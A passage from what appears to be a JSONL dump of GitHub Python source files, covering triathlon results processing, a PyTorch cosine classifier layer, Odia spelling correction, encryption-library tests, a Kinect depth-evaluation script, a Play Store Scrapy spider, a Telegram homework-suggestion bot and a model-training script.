= result_parser.get_gender(result)\n gender_size = count_by_gender[gender]\n overall_size = len(race_results)\n finish_status = result_parser.get_finish_status(result, log=True)\n status = IRONMAN_EVENT_STATUS_TO_TRISCORE[finish_status]\n\n legs = get_legs(result)\n finish_time = legs[builder.FINISH_LEG]['t']\n finish_rank = legs[builder.FINISH_LEG]['or']\n\n assert finish_time >= last_finish_time, \\\n f'descending finish time: {finish_time} last: {last_finish_time}\\nresult: {result}\\nathlete: {athlete_result}'\n\n assert finish_rank >= last_finish_rank, \\\n f'descending finish rank: {finish_rank} last: {last_finish_rank}\\nresult: {result}\\nathlete: {athlete_result}'\n\n athlete_result = builder.build_athlete_result(\n athlete_id=athlete_id,\n athlete_name=athlete_name,\n country_iso_num=country_iso_num,\n bib=bib,\n age_group=age_group,\n age_group_size=age_group_size,\n gender=gender,\n gender_size=gender_size,\n overall_size=overall_size,\n status=status,\n legs=legs)\n logger.debug(f'result: {athlete_result}')\n athlete_results.append(athlete_result)\n\n last_finish_time = finish_time\n last_finish_rank = finish_rank\n\n if dry_run:\n logger.info(\n f'DRY_RUN: skip adding race: {race_info} results: {len(athlete_results)}')\n else:\n assert triscore_storage.add_race(\n race_info, athlete_results), f'failed to add race: {race_info}'\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('-d', '--database', default='triscore')\n parser.add_argument('-u', '--username', default='triscore-writer')\n parser.add_argument('-p', '--password', required=True)\n parser.add_argument('-l', '--limit', type=int, default=0)\n parser.add_argument('-t', '--timeout', type=int, default=None)\n parser.add_argument('--dry-run', action='store_true')\n args = parser.parse_args()\n\n mongo_client = MongoClient(username=args.username, password=args.password, authSource=args.database)\n\n while True:\n transform_ironman_to_triscore(mongo_client, args.limit, args.dry_run)\n if not dt.wait(args.timeout):\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ddbrx/triscore","sub_path":"data/ironman/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":19077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72870696861","text":"# From Official LUCIR Code\nimport math\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import functional as F\nfrom torch.nn import Module\nfrom cl_methods.cl_utils import stable_cosine_distance\n\ndef _reduce_proxies(similarities, num_proxy):\n # shape (batch_size, n_classes * proxy_per_class)\n n_classes = similarities.shape[1] / num_proxy\n assert n_classes.is_integer(), (similarities.shape[1], num_proxy)\n n_classes = int(n_classes)\n bs = similarities.shape[0]\n\n simi_per_class = similarities.view(bs, n_classes, num_proxy)\n attentions = F.softmax(simi_per_class, dim=-1)\n return (simi_per_class * attentions).sum(-1)\n\nclass CosineLinear(Module):\n def __init__(self, in_features, out_features, num_proxy=1, sigma_learnable=True, sigma=1.0,\n eta_learnable=True, eta=1.0, version='cc', nca_margin=0.6, is_train=True):\n super(CosineLinear, self).__init__()\n self.version = version\n self.num_proxy = num_proxy\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.Tensor(self.num_proxy * out_features, in_features))\n\n self.sigma_learnable = sigma_learnable\n self.sigma = sigma\n if self.sigma_learnable:\n self.sigma = Parameter(torch.ones(1))\n\n self.eta_learnable = eta_learnable\n self.eta = eta\n\n if self.eta_learnable:\n self.eta = Parameter(torch.ones(1))\n self.nca_margin = nca_margin\n self.reset_parameters()\n self.is_train = is_train\n\n def reset_parameters(self):\n if self.version == 'lsc':\n nn.init.kaiming_normal_(self.weight, nonlinearity='linear')\n else:\n stdv = 1. / math.sqrt(self.weight.size(1))\n self.weight.data.uniform_(-stdv, stdv)\n\n if isinstance(self.sigma, Parameter):\n self.sigma.data.fill_(1) #for initializaiton of sigma\n if self.eta and isinstance(self.eta, Parameter):\n self.eta.data.fill_(1)\n\n def forward(self, input, sigma_from_wrapper=None):\n if self.version == 'cc':\n out = F.linear(F.normalize(input, p=2,dim=1), \\\n F.normalize(self.weight, p=2, dim=1))\n out = self.sigma * out\n elif self.version == 'lsc':\n if sigma_from_wrapper is None:\n features = self.sigma * F.normalize(input,p=2,dim=1)\n weights = self.sigma * F.normalize(self.weight,p=2,dim=1)\n out = - stable_cosine_distance(features, weights)\n out = _reduce_proxies(out, self.num_proxy)\n if self.is_train:\n out = self.eta * (out - self.nca_margin)\n else:\n features = sigma_from_wrapper * F.normalize(input,p=2,dim=1)\n weights = sigma_from_wrapper * F.normalize(self.weight,p=2,dim=1)\n out = - stable_cosine_distance(features, weights)\n out = _reduce_proxies(out, self.num_proxy)\n return out\n\n def extra_repr(self):\n # (Optional)Set the extra information about this module. You can test\n # it by printing an object of this class.\n return 'input_features={}, output_features={}, sigma={}, eta={}'.format(\n self.in_features, self.num_proxy*self.out_features,\n self.sigma.data if self.sigma_learnable else self.sigma,\n self.eta.data if self.eta_learnable else self.eta\n )\n\nclass SplitCosineLinear(Module):\n #consists of two fc layers and concatenate their outputs\n def __init__(self, in_features, out_features1, out_features2, num_proxy=1, sigma_learnable=True, sigma=1.0,\n eta_learnable=False, eta=1.0, version='cc', nca_margin=0.6, is_train=True):\n super(SplitCosineLinear, self).__init__()\n self.version = version\n self.in_features = in_features\n self.out_features = out_features1 + out_features2\n self.num_proxy = num_proxy\n self.fc1 = CosineLinear(in_features, out_features1, self.num_proxy,\n False, 1.0, False, 1.0, version=self.version)\n self.fc2 = CosineLinear(in_features, out_features2, self.num_proxy,\n False, 1.0, False, 1.0, version=self.version)\n self.sigma_learnable = sigma_learnable\n self.sigma = sigma\n self.eta_learnable = eta_learnable\n self.eta = eta\n if self.sigma_learnable:\n self.sigma = Parameter(torch.Tensor(1))\n self.sigma.data.fill_(1)\n\n if self.eta_learnable:\n self.eta = Parameter(torch.Tensor(1))\n\n self.nca_margin = nca_margin\n self.is_train = is_train\n\n def forward(self, x):\n if self.version == 'cc':\n out1 = self.fc1(x)\n out2 = self.fc2(x)\n out = torch.cat((out1, out2), dim=1) #concatenate along the channel\n if self.sigma is not None:\n out = self.sigma * out\n elif self.version == 'lsc': # for pod (nca_loss)...\n out1 = self.fc1(x, self.sigma)\n out2 = self.fc2(x, self.sigma)\n out = torch.cat((out1,out2),dim=1)\n if self.is_train:\n out = self.eta * (out - self.nca_margin)\n\n return out\n\n def extra_repr(self):\n # (Optional)Set the extra information about this module. You can test\n # it by printing an object of this class.\n return 'input_features={}, output_features={}, sigma={}, eta={}'.format(\n self.in_features, self.num_proxy * self.out_features,\n self.sigma.data if self.sigma_learnable else self.sigma,\n self.eta.data if self.eta_learnable else self.eta\n )\n\n","repo_name":"bellos1203/TCD","sub_path":"cl_methods/cosine_linear.py","file_name":"cosine_linear.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"11792179055","text":"import json\nimport os\nfrom collections import Counter\nfrom typing import Dict\n\nfrom gensim.models import FastText\n\n\ndef edit_distance(s1: str, s2: str) -> int:\n \"\"\"Compute edit distance between two strings using dynamic programmic.\n Lifted from: https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance#Python\"\"\"\n if len(s1) < len(s2):\n return edit_distance(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and\n # current_row are one character longer than s2\n deletions = current_row[j] + 1\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n\ndef load_vocab(json_filepath: str) -> Counter:\n \"\"\"Load vocab from json file\"\"\"\n with open(json_filepath, 'r', encoding='utf-8') as f:\n s = f.read()\n vocab_dict = json.loads(s)\n vocab_counter = Counter(vocab_dict)\n return vocab_counter\n\n\ndef find_correct_spelling(model: FastText, incorrect_word: str, num_neighbours: int, clean_vocab_counter: Counter,\n mixed_vocab_counter: Counter, mixed_vocab_min_freq: int,\n max_edit_distance: int) -> Dict[str, str]:\n \"\"\"Find correct spelling for a given word which is incorrectly spelled\"\"\"\n\n correct_word, message = '', ''\n\n mixed_vocab_set = set()\n for word, freq in mixed_vocab_counter.most_common():\n if freq >= mixed_vocab_min_freq:\n mixed_vocab_set.add(word)\n\n if incorrect_word in clean_vocab_counter or incorrect_word in mixed_vocab_set:\n message = f'{incorrect_word} is already correctly spelled'\n else:\n tups = model.wv.most_similar(incorrect_word, topn=num_neighbours)\n candidates = [candidate for candidate, _ in tups]\n\n for candidate in candidates:\n if candidate in clean_vocab_counter and edit_distance(incorrect_word, candidate) <= max_edit_distance:\n correct_word = candidate\n break\n\n if correct_word == '':\n for candidate in candidates:\n if candidate in mixed_vocab_set and edit_distance(incorrect_word, candidate) <= max_edit_distance:\n correct_word = candidate\n break\n if correct_word == '':\n message = 'Correct spelling not found'\n return {'incorrect_word': incorrect_word, 'correct_word': correct_word, 'message': message}\n\n\nif __name__ == \"__main__\":\n _incorrect_word = 'ସାପ୍ତାହୀକ'\n _num_neighbours = 10\n _mixed_vocab_min_freq = 50\n _max_edit_distance = 2\n\n _model = FastText.load(os.path.join('embeddings.txt'))\n _clean_vocab_counter = load_vocab(os.path.join('clean_vocab_counter.json'))\n _mixed_vocab_counter = load_vocab(os.path.join('mixed_vocab_counter.json'))\n out = find_correct_spelling(model=_model, incorrect_word=_incorrect_word, num_neighbours=_num_neighbours,\n clean_vocab_counter=_clean_vocab_counter,\n mixed_vocab_counter=_mixed_vocab_counter, mixed_vocab_min_freq=_mixed_vocab_min_freq,\n max_edit_distance=_max_edit_distance)\n print(out)\n","repo_name":"OdiaNLP/spelling-correction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"27008796145","text":"\nimport shutil\nimport tempfile\nfrom base64 import urlsafe_b64encode\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\n\nclass TestRandomEncryption(unittest.TestCase):\n\n def setUp(self):\n self.dirpath = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.dirpath)\n\n def _make_default(self):\n from randenc import RandomEncryption\n return RandomEncryption(self.dirpath)\n\n def test_encrypt_and_decrypt_without_compression(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt({'message': 'Hello, world!'})\n self.assertIsInstance(ciphertext, unicode)\n data = randenc.decrypt(ciphertext)\n self.assertLess(len(ciphertext), 120)\n self.assertEqual(data, {'message': 'Hello, world!'})\n\n # Encrypting again should not produce the same ciphertext.\n ciphertext2 = randenc.encrypt({'message': 'Hello, world!'})\n self.assertNotEqual(ciphertext, ciphertext2)\n\n def test_encrypt_and_decrypt_with_compression(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt('0' * 4000)\n self.assertIsInstance(ciphertext, unicode)\n # The content is easy to compress, so expect a relatively\n # small message.\n self.assertLess(len(ciphertext), 200)\n data = randenc.decrypt(ciphertext)\n self.assertEqual(data, '0' * 4000)\n\n def test_encrypt_and_decrypt_tiny(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt(3)\n self.assertIsInstance(ciphertext, unicode)\n data = randenc.decrypt(ciphertext)\n self.assertGreater(len(ciphertext), 70)\n self.assertLess(len(ciphertext), 90)\n self.assertEqual(data, 3)\n\n def test_decrypt_wrong_format(self):\n randenc = self._make_default()\n from randenc import DecryptionError\n with self.assertRaises(DecryptionError):\n randenc.decrypt('BBBB')\n\n def test_decrypt_missing_key_id(self):\n randenc = self._make_default()\n from randenc import DecryptionError\n with self.assertRaises(DecryptionError):\n randenc.decrypt(urlsafe_b64encode(b'\\0spam'))\n\n def test_decrypt_with_signature_mismatch(self):\n randenc = self._make_default()\n ciphertext = randenc.encrypt({'message': 'Hello, world!'})\n data = randenc.decrypt.b64decode(ciphertext)\n data = data[:-1] + bytes([ord(data[-1]) ^ 16])\n broken_ciphertext = urlsafe_b64encode(data)\n from randenc import DecryptionError\n with self.assertRaises(DecryptionError):\n randenc.decrypt(broken_ciphertext)\n","repo_name":"hathawsh/randenc","sub_path":"src/randenc/tests/test_randenc.py","file_name":"test_randenc.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37766232631","text":"import sys\nsys.path.insert(0,'../sim/')\nimport numpy as np\nimport os, json, glob\nimport imageio\nimport matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom utils import *\nfrom tof_class import *\nimport pdb\nimport pickle\nimport time\nimport scipy.misc\nfrom scipy import sparse\nfrom copy import deepcopy\nfrom joblib import Parallel, delayed\nimport multiprocessing\nfrom kinect_spec import *\nimport cv2\nfrom numpy import linalg as LA\nfrom scipy import signal\nimport parser\nimport argparse\n\nfrom tensorflow.contrib import learn\nfrom tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib\ntf.logging.set_verbosity(tf.logging.INFO)\nfrom vis_flow import *\nfrom kinect_init import *\n\nPI = 3.14159265358979323846\nraw_depth_new = 0\nflg = False\n\ndtype = tf.float32\n\ndef metric_valid(depth, gt, msk):\n # compute mean absolute error on places where msk = 1\n msk /= np.sum(msk)\n return np.sum(np.abs(depth - gt)*msk)\n\ndef data_augment(scene_n, array_dir, tof_cam, text_flg = False):\n print('Augmenting scene', scene_n)\n ## load all data\n # if the raw file does not exist, just find one and use\n if not os.path.exists(array_dir+scene_n[-16:]+'.pickle'):\n scenes = glob.glob(array_dir+'*.pickle')\n with open(scenes[0],'rb') as f:\n data = pickle.load(f)\n cam = data['cam']\n\n # separately read the true depth and true rendering\n with open(scene_n[0:-16]+'gt/'+scene_n[-16::],'rb') as f:\n gt=np.fromfile(f, dtype=np.float32)\n depth_true = np.reshape(gt,(cam['dimy']*4,cam['dimx']*4))\n\n with open(scene_n[0:-16]+'ideal/'+scene_n[-16::],'rb') as f:\n meas_gt=np.fromfile(f, dtype=np.int32)\n meas_gt = np.reshape(meas_gt,(cam['dimy'],cam['dimx'],9)).astype(np.float32)\n else:\n with open(array_dir+scene_n[-16::]+'.pickle','rb') as f:\n data = pickle.load(f)\n program = data['program']\n cam = data['cam']\n cam_t = data['cam_t']\n scene = data['scene']\n depth_true = data['depth_true']\n prop_idx = data['prop_idx']\n prop_s = data['prop_s'] \n res_gt = tof_cam.process_gt_delay_vig_dist_surf_mapmax(cam, prop_idx, prop_s, scene, depth_true)\n meas_gt = res_gt['meas']\n\n # directly read pregenerate raw measurement\n with open(scene_n[0:-16]+'full/'+scene_n[-16::],'rb') as f:\n meas=np.fromfile(f, dtype=np.int32)\n meas = np.reshape(meas,(cam['dimy'],cam['dimx'],9)).astype(np.float32)\n msk = kinect_mask().astype(np.float32)\n meas = [meas[:,:,i]*msk/tof_cam.cam['map_max'] for i in range(meas.shape[-1])]\n meas_gt = [meas_gt[:,:,i]*msk/tof_cam.cam['map_max'] for i in range(meas_gt.shape[-1])]\n meas = np.stack(meas, -1)\n meas_gt = np.stack(meas_gt, -1)\n\n # reduce the resolution of the depth\n depth_true_s = scipy.misc.imresize(\\\n depth_true,\\\n meas.shape[0:2],\\\n mode='F'\\\n )\n depth_true_s = tof_cam.dist_to_depth(depth_true_s)\n\n # load the mask and classification\n with open(scene_n[0:-16]+'msk'+'/'+scene_n[-16:],'rb') as f:\n msk_array=np.fromfile(f, dtype=np.float32)\n msk_array = np.reshape(msk_array,(cam['dimy'],cam['dimx'],4))\n msk = {}\n msk['background'] = msk_array[:,:,0]\n msk['edge'] = msk_array[:,:,1]\n msk['noise'] = msk_array[:,:,2]\n msk['reflection'] = msk_array[:,:,3]\n\n # compute mask\n msk_true_s = msk['background'] * msk['edge']\n\n # apply the texture whether one wants the texture or not\n if text_flg == True:\n # add textures (simply multiply a ratio)\n # theoretically one should first add texture then add the noise\n # but doing it this approximate way is faster\n texts = glob.glob('../params/kinect/textures-curet/'+'*.png')\n idx = np.random.choice(len(texts),1,replace=False)[0]\n im_text = cv2.imread(texts[idx],0).astype(np.float32)\n im_text /= 255.\n lo = np.random.uniform(0,1) # random range\n hi = np.random.uniform(lo,1)\n im_text = im_text * (hi-lo) + lo\n im_text = scipy.misc.imresize(im_text,meas.shape[0:2],mode='F')\n im_text = np.expand_dims(im_text,-1)\n\n meas = meas * im_text\n meas_gt = meas_gt * im_text\n\n true = np.stack([depth_true_s, msk_true_s],-1)\n true = np.concatenate([true, meas_gt], -1)\n\n # cut the regions\n meas = meas[20:-20,:,:]\n true = true[20:-20,:,:]\n depth_true_s = depth_true_s[20:-20,:]\n msk_true_s = msk_true_s[20:-20,:]\n\n # the input of the network\n return meas, true, depth_true_s, msk_true_s\n\ndef testing(tests, array_dir, output_dir, tof_cam, tof_net):\n # testing\n errs = []\n errs_base = []\n errs_num_pix = []\n pix_num_all = 0\n errs_total = []\n errs_base_total = []\n step =1\n for iter_idx in range(0,len(tests),step):\n te_idx = np.arange(iter_idx,min(iter_idx+step,len(tests)))\n x = []\n y = []\n z_gts = []\n msk_gts = []\n for i in range(len(te_idx)):\n x_te,y_te,z_gt,msk_gt = data_augment(tests[te_idx[i]], array_dir, tof_cam)\n x.append(x_te)\n y.append(y_te)\n z_gts.append(z_gt)\n msk_gts.append(msk_gt)\n x = np.stack(x,0)\n y = np.stack(y,0)\n z_gts = np.stack(z_gts, 0)\n msk_gts = np.stack(msk_gts, 0)\n\n # predict data\n data = list(tof_net.predict(x=x))\n mid = 4\n for j in range(len(data)):\n x_warped = np.expand_dims(data[j]['x_warped_r:0'],0)\n depth = data[j]['depth']\n depth_gt = y[j,:,:,0]\n msk = data[j]['depth_msk:0']*(depth_gt>1e-4)\n err_2norm = np.sqrt(np.sum(((depth-depth_gt)*msk)**2)/np.sum(msk))\n err_1norm = np.sum((depth-depth_gt)*msk)/np.sum(msk)\n\n err_warped = np.sqrt(np.mean(np.abs(x_warped - y[:,:,:,2::])**2))\n\n fig = plt.figure()\n plt.suptitle('Original Raw')\n for i in range(9):\n ax=fig.add_subplot(3,3,i+1);\n plt.imshow(x[j,:,:,i]);\n plt.axis('off')\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n fig = plt.figure()\n plt.suptitle('Raw after MRM')\n for i in range(9):\n ax=fig.add_subplot(3,3,i+1);\n plt.imshow(x_warped[j,:,:,i]);\n plt.axis('off')\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n fig = plt.figure()\n msk_sign = kinect_mask().astype(np.float32)[20:-20,:]\n plt.suptitle('Ground truth Raw')\n for i in range(9):\n ax=fig.add_subplot(3,3,i+1);\n plt.imshow(y[j,:,:,i+2]);\n plt.axis('off')\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n # use the kinect pipeline to produce depth\n xs = [x[j,:,:,:]]\n msk_sign = kinect_mask().astype(np.float32)\n msk_or = np.ones([384,512,1])\n depths = []\n for x_or in xs:\n y_or = np.concatenate([msk_or,msk_or,x_or],-1)\n x_or = np.concatenate([np.zeros([20,512,9]),x_or,np.zeros([20,512,9])],0)\n y_or = np.concatenate([np.zeros([20,512,11]),y_or,np.zeros([20,512,11])],0)\n x_or = [x_or[:,:,i]*msk_sign*tof_cam.cam['map_max'] for i in range(x_or.shape[-1])]\n x_or = np.stack(x_or,-1)\n x_or = np.expand_dims(x_or,0)\n y_or = np.expand_dims(y_or,0)\n depths.append(list(raw_depth_new.predict(x=x_or))[0]['depth'])\n \n depth_or = depths[0]\n depth_or = depth_or[20:-20,:]\n\n vmin=prms['min_depth']/1000\n vmax=prms['max_depth']/1000\n msk_gt = msk_gts[j]\n fig=plt.figure()\n ax=fig.add_subplot(2,4,1)\n msk_or = (depth_or>vmin)*(depth_gt>vmin)*msk_gt\n err = np.sum(np.abs(depth_or - depth_gt)*msk_or)/np.sum(msk_or)\n\n # record the error\n err_list = np.abs(depth_or - depth_gt)\n err_list = err_list[np.where(msk_or>0.999)]\n pix_num_all += len(depth_or.flatten())\n errs_base.append(err_list)\n \n plt.title(\"Original, err: \"+'%.4f'%err+'m')\n plt.imshow(depth_or*msk_or,vmin=vmin,vmax=vmax)\n plt.axis('off')\n\n ax=fig.add_subplot(2,4,2)\n plt.imshow((depth_or-depth_gt)*msk_or,vmin=-0.1,vmax=0.1)\n plt.axis('off')\n\n ax=fig.add_subplot(2,4,3)\n msk = (depth>vmin)*(depth_gt>vmin)*msk_gt\n err = np.sum(np.abs(depth - depth_gt)*msk)/np.sum(msk)\n\n # record the error\n err_list = np.abs(depth - depth_gt)\n err_list = err_list[np.where(msk>0.999)]\n errs.append(err_list)\n\n plt.title(\"KPN, err: \"+'%.4f'%err+'m')\n plt.imshow(depth*msk,vmin=vmin,vmax=vmax)\n plt.axis('off')\n\n ax=fig.add_subplot(2,4,4)\n plt.imshow((depth-depth_gt)*msk,vmin=-0.1,vmax=0.1)\n plt.axis('off')\n\n ax=fig.add_subplot(2,4,7)\n plt.title(\"True depth\")\n plt.imshow(depth_gt*msk,vmin=vmin,vmax=vmax)\n plt.colorbar()\n plt.axis('off')\n\n ax=fig.add_subplot(2,4,8)\n plt.title(\"True depth\")\n plt.imshow((depth_gt-depth_gt)*msk,vmin=-0.1,vmax=0.1)\n plt.axis('off')\n\n name = int(np.random.uniform()*1e10)\n plt.savefig(\\\n output_dir+str(name)+'.png',\n bbox_inches='tight',\n dpi = 2*512,\n )\n\n text_file = open(output_dir+\"err.txt\", \"w\")\n text_file.write(\"Mean base err: Density: Mean net err: Density: \\n\")\n text_file.write(\\\n str(np.mean(np.concatenate(errs_base,0)))+\" \"+\\\n str(len(np.concatenate(errs_base))/pix_num_all)+\" \"+\\\n str(np.mean(np.concatenate(errs,0)))+\" \"+\\\n str(len(np.concatenate(errs))/pix_num_all)+\"\\n\"\n )\n\n return\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(\"testing MRM LF2\")\n parser.add_argument('-n', '--n-images', type=int, default = -1, help='number of images to process; -1 to process all the images')\n args = parser.parse_args()\n\n array_dir = '../FLAT/trans_render/static/'\n data_dir = '../FLAT/kinect/'\n\n # initialize the camera model\n tof_cam = kinect_real_tf()\n\n # input the folder that trains the data\n # only use the files listed\n f = open('../FLAT/kinect/list/test.txt','r')\n message = f.read()\n files = message.split('\\n')\n tests = files[0:-1]\n if args.n_images!=-1:\n\t tests = tests[0:args.n_images]\n tests = [data_dir+test for test in tests]\n\n # create the network estimator\n file_name = 'MRM_LF2'\n from MRM_LF2 import tof_net_func\n tof_net = learn.Estimator(\n model_fn=tof_net_func,\n model_dir=\"./models/kinect/\"+file_name,\n )\n\n # load the baseline method\n baseline_name = 'LF2'\n from LF2 import tof_net_func\n raw_depth_new = learn.Estimator(\n model_fn=tof_net_func,\n model_dir=\"./models/kinect/\"+baseline_name,\n )\n\n # create output folder\n output_dir = './results/'\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n output_dir += 'kinect/'\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n folder_name = file_name \n output_dir = output_dir + folder_name + '/'\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n\n testing(tests, array_dir, output_dir, tof_cam, tof_net)\n","repo_name":"NVlabs/FLAT","sub_path":"pipe/testing_MRM_LF2.py","file_name":"testing_MRM_LF2.py","file_ext":"py","file_size_in_byte":12175,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"69"}
+{"seq_id":"6599359885","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport scrapy\n\nfrom play_store.items import PlayStoreApp, PlayStoreCategory\n\n# The maximum number of records on the 'Top' lists.\nMAX = 540\n\n\nclass AppSpider(scrapy.Spider):\n name = \"apps\"\n category = \"\"\n rank = 0\n\n def parse(self, response):\n if not self.rank % 60 and self.rank != MAX:\n for href in response.xpath('//a[@class=\"title\"]/@href').extract():\n item = PlayStoreApp()\n item['price'] = response.xpath(\n '//span[@class=\"display-price\"]/text()'\n ).extract()[self.rank * 2 % 60]\n item['rank'] = self.rank + 1\n full_url = response.urljoin(href)\n request = scrapy.Request(full_url, callback=self.parse_app)\n request.meta['item'] = item\n self.rank += 1\n yield request\n url = response.urljoin(\"?start=\" + str(self.rank))\n yield scrapy.Request(url)\n\n def parse_app(self, response):\n item = response.meta['item']\n\n item['os'] = response.xpath(\n '//div[@itemprop=\"operatingSystems\"]/text()').extract()[0]\n item['size'] = response.xpath(\n '//div[@itemprop=\"fileSize\"]/text()').extract()\n item['title'] = response.xpath(\n '//div[@class=\"id-app-title\"]/text()').extract()[0]\n item['genre'] = response.xpath(\n '//span[@itemprop=\"genre\"]/text()').extract()\n item['score'] = response.xpath(\n '//meta[@itemprop=\"ratingValue\"]/@content').extract()[0]\n item['developer'] = response.xpath(\n '//span[@itemprop=\"name\"]/text()').extract()[0]\n item['downloads'] = response.xpath(\n '//div[@itemprop=\"numDownloads\"]/text()').extract()[0]\n item['last_update'] = response.xpath(\n '//div[@itemprop=\"datePublished\"]/text()').extract()[0]\n item['reviews_num'] = response.xpath(\n '//meta[@itemprop=\"ratingCount\"]/@content').extract()[0]\n item['content_rating'] = response.xpath(\n '//div[@itemprop=\"contentRating\"]/text()').extract()[0]\n\n yield item\n\n\nclass CategorySpider(scrapy.Spider):\n name = \"categories\"\n start_urls = ['https://play.google.com/store/apps/']\n category = \"\"\n\n def parse(self, response):\n # The way top lists work with age ranges are a bit different on the\n # link construction, I'll leave them out for now with not(contains).\n categories = response.xpath(\"//a[contains(@href, 'category') and \\\n not(contains(@href, '?')) and \\\n @class='child-submenu-link']\")\n\n for category in categories:\n item = PlayStoreCategory()\n item['title'] = category.xpath(\"text()\").extract()[0]\n item['url'] = category.xpath(\"@href\").extract()[0]\n\n yield item\n","repo_name":"streeck/playstore-crawler","sub_path":"play_store/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36664470382","text":"from aiogram import Dispatcher, types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types.message import ContentType\nfrom loguru import logger\n\nfrom app import config\nfrom app.models.base import User\nfrom app.models.suggestion import Suggestion\nfrom app.utils import markups\nfrom app.utils.states import UserStates\n\n\nasync def cmd_start(message: types.Message, user: User, state: FSMContext):\n logger.info(\"Start\")\n await state.finish()\n\n await UserStates.Input_suggesting_msg.set()\n await message.answer(\n f\"\"\"\nПривет!\nОтправь свою домашку в любом виде. После проверки модераторами она попадёт в специальный канал со всеми домашками: {config.MAIN_CHANNEL_USERNAME}\n\nУ тебя не должнен быть скрытый профиль, в противном случае люди просто не смогут тебе написать.\n \"\"\"\n )\n\n\nasync def input_suggesting_msg(message: types.Message, user: User, state: FSMContext):\n logger.info(\"Input suggesting message\")\n\n forwarded_msg = await message.forward(config.MODER_CHANNEL_ID)\n await forwarded_msg.reply(\n \"Одобрить?\",\n reply_markup=markups.approve_suggestion(forwarded_msg.message_id),\n disable_notification=True,\n )\n\n await Suggestion.create(id=forwarded_msg.message_id, user=user)\n logger.info(\n f\"\"\"Inputed suggesting message\nURL: {forwarded_msg.url}\n \"\"\"\n )\n\n await message.answer(\n \"\"\"\nПринято! Ожидай пока модераторы проверят твоё сообщение, я тебя оповещу когда они одобрят.\n\nА пока можешь отправить ещё одну домашку\n \"\"\"\n )\n\n\ndef register_base(dp: Dispatcher):\n dp.register_message_handler(cmd_start, commands=\"start\", state=\"*\")\n dp.register_message_handler(\n input_suggesting_msg,\n content_types=ContentType.ANY,\n state=UserStates.Input_suggesting_msg,\n )\n","repo_name":"nacknime-official/gdz_ukraine_suggest_bot","sub_path":"app/handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10231521627","text":"import sys\n\nsys.path.append(\"../\")\nfrom utils import *\nfrom models import *\nfrom dataloader import *\nimport argparse\nfrom attribution_utils import *\n\nimport params\n\nparser = params.parse_args()\nargs = parser.parse_args()\nargs = params.add_config(args) if args.config_file != None else args\nargs = vars(args)\nargs[\"dataset2\"] = args[\"dataset1\"]\nargs[\"noise_2\"] = args[\"noise_1\"]\nprint(args)\nfilename = f'logs/{args[\"dataset1\"]}/{args[\"model_type\"]}_lr_{args[\"lr1\"]}_noise_{args[\"noise_1\"]}_{args[\"model_type\"]}_{args[\"sched\"]}_seed_{args[\"seed\"]}_model-seed{args[\"model_seed\"]}/'\nprint (filename)\n\n\nseed_everything(args[\"seed\"])\npre_dict, ft_dict = return_loaders(args, get_frac=False, shuffle = False, aug = False)\nmodel_name = f\"{filename}{args['model_type']}_final.pt\"\n\n\ntry:\n assert (os.path.exists(filename))\nexcept:\n # Train the Model\n print (\"######### Training Model ###########\")\n model = get_model(args[\"model_type\"], NUM_CLASSES=10)\n model = model.cuda()\n train_loader = pre_dict[\"train_loader\"]\n optimizer = SGD(model.parameters(), lr=args[\"lr1\"], momentum=0.9, weight_decay=5e-4)\n\n scheduler, EPOCHS = get_scheduler_epochs(\"triangle\", optimizer, train_loader, max_epochs = 25)\n loss_fn = nn.CrossEntropyLoss()\n train_rets = train(model, train_loader, optimizer, scheduler, loss_fn, 